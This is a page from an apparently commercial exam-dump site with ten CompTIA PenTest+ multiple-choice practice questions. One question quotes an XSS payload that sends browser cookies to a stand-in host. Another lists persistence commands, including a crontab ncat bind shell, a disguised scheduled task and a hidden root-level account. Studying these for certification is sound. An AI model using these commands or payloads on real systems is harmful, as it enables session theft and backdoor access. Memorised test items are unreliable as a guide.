Summer Sale Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: buysanta

Exact2Pass Menu

CompTIA PenTest+ Certification Exam

Last Update 15 hours ago Total Questions : 464

The CompTIA PenTest+ Certification Exam content is now fully updated, with all current exam questions added 15 hours ago. Deciding to include PT0-002 practice exam questions in your study plan goes far beyond basic test preparation.

You'll find that our PT0-002 exam questions frequently feature detailed scenarios and practical problem-solving exercises that directly mirror industry challenges. Engaging with these PT0-002 sample sets allows you to effectively manage your time and pace yourself, giving you the ability to finish any CompTIA PenTest+ Certification Exam practice test comfortably within the allotted time.

Question # 11

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?

A.

< #

B.

< $

C.

##

D.

#$

E.

#!

Question # 12

A penetration tester conducts an Nmap scan against a target and receives the following results:

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

A.

Nessus

B.

ProxyChains

C.

OWASPZAP

D.

Empire

Question # 13

Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

A.

chmod u+x script.sh

B.

chmod u+e script.sh

C.

chmod o+e script.sh

D.

chmod o+x script.sh

Question # 14

A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987.

Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?

A.

SQLmap

B.

Nessus

C.

Nikto

D.

DirBuster

Question # 15

Giv en the following code:

< SCRIPT > var+img=new+Image();img.src=”http://hacker/%20+%20document.cookie; < /SCRIPT >

Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

A.

Web-application firewall

B.

Parameterized queries

C.

Output encoding

D.

Session tokens

E.

Input validation

F.

Base64 encoding

Question # 16

A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?

A.

A signed statement of work

B.

The correct user accounts and associated passwords

C.

The expected time frame of the assessment

D.

The proper emergency contacts for the client

Question # 17

A penetration tester wants to test a list of common passwords against the SSH daemon on a network device. Which of the following tools would be BEST to use for this purpose?

A.

Hashcat

B.

Mimikatz

C.

Patator

D.

John the Ripper

Question # 18

A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the following should the tester do with this information to make this a successful exploit?

A.

Perform XSS.

B.

Conduct a watering-hole attack.

C.

Use BeEF.

D.

Use browser autopwn.

Question # 19

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client’s laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?

A.

schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe

B.

wmic startup get caption,command

C.

crontab –l; echo “@reboot sleep 200 & & ncat –lvp 4242 –e /bin/bash”) | crontab 2 > /dev/null

D.

sudo useradd –ou 0 –g 0 user

Question # 20

A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company’s employees.

Which of the following tools can help the tester achieve this goal?

A.

Metasploit

B.

Hydra

C.

SET

D.

WPScan

Go to page: